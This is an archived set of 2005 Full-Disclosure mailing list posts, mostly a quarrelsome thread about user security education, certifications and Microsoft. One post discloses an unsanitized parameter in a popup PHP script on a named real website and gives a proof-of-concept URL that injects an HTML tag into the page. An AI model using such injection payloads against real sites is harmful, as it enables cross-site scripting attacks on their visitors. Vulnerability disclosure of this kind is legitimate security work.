> > Virus Friendly and phased might be to young to remember the old saying "what
> > you want the next generation to believe begin teaching this generation". It
> 
> That's a nicely worded brainwashing statement. How about having the next
> generation believe truth not what you want them to believe. Do you by
> chance work for Cisco or Microsoft "They're not really vulnerabilities
> believe me..."

One acronym: BSOD.  Why have users learned what it is, and grown accepting of
seeing one?  Do you know any Windows users who have *never* encountered one?
How many Windows users would believe that before Microsoft, vendors actually
would take a *single* crash reported by *one* user seriously enough to
investigate and produce a bugfix, and that vendors would escalate to the point
of sending developers to the customer site if a system crashed multiple times
and no fix was in sight in a week?

For all its monopolistic abuses, the single worst thing Microsoft has done
for the computer industry is lowered user expectations regarding software.



pgp3Ns5YEm24y.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Bigger burger roll needed

[J. Oquendo]

On Mon, 3 Oct 2005, Randall M wrote:

> Virus Friendly and phased might be to young to remember the old saying "what
> you want the next generation to believe begin teaching this generation". It

That's a nicely worded brainwashing statement. How about having the next
generation believe truth not what you want them to believe. Do you by
chance work for Cisco or Microsoft "They're not really vulnerabilities
believe me..."

> is a known fact that the major cause of computer criminal acts is the result
> of careless and uneducated users. I have said it again and again, the "User"
> is the best defense any Admin can have.

How is this a known fact rather than an ASSumption. Facts speak louder
than words so rather than repeat what others have... well repeated some
nice facts pointed out would have been nice. From my inference on your
comment, that would mean every "major" malicious hack ever done was done
by someone who didn't have a clue. The user is the biggest security risk
and THAT is a known and published fact, not vice versa.

> If she or he understands the dangers they will not click the tempting
> link or download the pretty card. And if  they take what they have
> learned home with them they diminish the Botnet army. As far as "16 year
> olds can pass the CISSP exam" statement, that's a dam educated user.

Could they diminish any botnet army? I'm thinking in tunes of 16 year old
with hormones out of control, acting up out of rebellion and I'm wondering
if the mental capacity is fully there to not spread malice if they had the
mental capacity to cause malice electronically.

I picture some frustrated 16 year old using a botnet to take out his
school because someone bullied him, Because his little girlfriend left him
so he decides to socially engineer some crap on his machine. I'm picturing
a 16 year old with misguided "morals" "nuking" a country's infrastructure
because his brain is filled with crapaganda.

As for the "dam educated user" statement, not to discount the studies
involved and passions possessed by those with certs, but quite frankly
those (certs) mean little to me considering I've seen those with
signatures the size of San Francisco have a clue the size of a flea. I
agree and disagree. On a side note I'm wondering what the ISC will
begin doing in about a decade considering the statistics nowadays:
"Growing at a rate of about 900 inmates each week between mid-2003 and
mid-2004, the nation's prisons and jails held 2.1 million people, or one
in every 138 U.S. residents" [http://tinyurl.com/dwplj] Perhaps abolish
their "guidelines".


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
GPG Key ID 0x97B43D89
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x97B43D89

"Every man builds his world in his own image. He has the
power to choose, but no power to escape the necessity of
choice." -- Ayn Rand
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Bigger burger roll needed

[Randall M]

Virus Friendly and phased might be to young to remember the old saying "what
you want the next generation to believe begin teaching this generation". It
is a known fact that the major cause of computer criminal acts is the result
of careless and uneducated users. I have said it again and again, the "User"
is the best defense any Admin can have. If she or he understands the dangers
they will not click the tempting link or download the pretty card. And if
they take what they have learned home with them they diminish the Botnet
army. As far as "16 year olds can pass the CISSP exam" statement, that's a
dam educated user.

Thank You
Randall M

=

"You too can have your very own Computer!"

Note: Side effects include: 
Blue screens; interrupt violation;
illegal operations; remote code
exploitations; virus and mailware infestations;
and other unknown vulnerabilities.

 

-Original Message-
From: [EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED] On 
Behalf Of phased
Sent: Monday, October 03, 2005 5:26 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re[2]: [Full-disclosure] Bigger burger roll needed

"Put information infront of the user, on unrelated pages. 
Keep doing it and eventually users will educated on a 
reasonable level to better check and patch systems, before 
the authors of malicious code and script kids get to them 
first." n3td3v

No, your receptionist really couldnt give a shit, they have 
enough to do without reading security advisories spammed to 
them every day.  What you would find is that they will 
probably learn more about adding a spam filter than 
securing their PC.  Educating end users on risk is good, 
but you cant expect them to patch their own systems 
especially when someone else is being paid to, or do you 
want to be out of a job? :)

-Original Message-
From: Virus Friendly <[EMAIL PROTECTED]>
To: n3td3v <[EMAIL PROTECTED]>
Date: Mon, 3 Oct 2005 04:47:09 -0400
Subject: Re: [Full-disclosure] Bigger burger roll needed

> I like how security professionals see themselves as part of the 
> intellectual elite and the "computer users" as the 
ignorant hoards.
> In a field where anyone is call an "expert", and 16 year 
olds can pass 
> a CISSP, how is it that these "experts" forget they are only a 
> certification away from being clueless.
> 
>  On 10/1/05, n3td3v <[EMAIL PROTECTED]> wrote:
> >
> > Hello to security community,
> >
> > n3td3v thought you might like to be alerted to his 
latest internet 
> > posting on corporate security and the relation between 
corporations, 
> > the consumer. and computer security.
> >
> > Details:
> >
> >
> > 
http://news.com.com/5208-12-0.html?forumID=1&threadID=10054&messageI
> > D=72865&start=-196
> >
> > Yours truely,
> >
> > n3td3v
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

[shell]

On the site tanfoglio.it, there is a small php script that provides a small
popup with a picture of their product. The vulnerability lies in the fact that
this script fails to sanitize input. This can allow a user to put arbitrary
code into the file.

POC:
http://www.tanfoglio.it/popup1.php?foto=%22%3E%3Cimg%20src=http://www.google.com/images/logo.gif%3E

If there are any sites with similar scripts, please inform me.

- Shell ([EMAIL PROTECTED])
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re[2]: [Full-disclosure] Bigger burger roll needed

[phased]

"Put information infront of the user, on unrelated pages. Keep doing it and 
eventually users will educated on a reasonable level to better check and patch 
systems, before the authors of malicious code and script kids get to them 
first." n3td3v

No, your receptionist really couldnt give a shit, they have enough to do without
reading security advisories spammed to them every day.  What you would find is
that they will probably learn more about adding a spam filter than securing
their PC.  Educating end users on risk is good, but you cant expect them to
patch their own systems especially when someone else is being paid to, or do
you want to be out of a job? :)

-Original Message-
From: Virus Friendly <[EMAIL PROTECTED]>
To: n3td3v <[EMAIL PROTECTED]>
Date: Mon, 3 Oct 2005 04:47:09 -0400
Subject: Re: [Full-disclosure] Bigger burger roll needed

> I like how security professionals see themselves as part of the intellectual
> elite and the "computer users" as the ignorant hoards.
> In a field where anyone is call an "expert", and 16 year olds can pass a
> CISSP, how is it that these "experts" forget they are only a certification
> away from being clueless.
> 
>  On 10/1/05, n3td3v <[EMAIL PROTECTED]> wrote:
> >
> > Hello to security community,
> >
> > n3td3v thought you might like to be alerted to his latest internet
> > posting on corporate security and the relation between corporations,
> > the consumer. and computer security.
> >
> > Details:
> >
> >
> > http://news.com.com/5208-12-0.html?forumID=1&threadID=10054&messageID=72865&start=-196
> >
> > Yours truely,
> >
> > n3td3v
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Bigger burger roll needed

[Virus Friendly]

I like how security professionals see themselves as part of the intellectual elite and the "computer users" as the ignorant hoards.
In a field where anyone is call an "expert", and 16 year olds can pass a CISSP, how is it that these "experts" forget they are only a certification away from being clueless. 
On 10/1/05, n3td3v <[EMAIL PROTECTED]> wrote:
Hello to security community,n3td3v thought you might like to be alerted to his latest internet
posting on corporate security and the relation between corporations,the consumer. and computer security.Details:
http://news.com.com/5208-12-0.html?forumID=1&threadID=10054&messageID=72865&start=-196Yours truely,n3td3v___Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/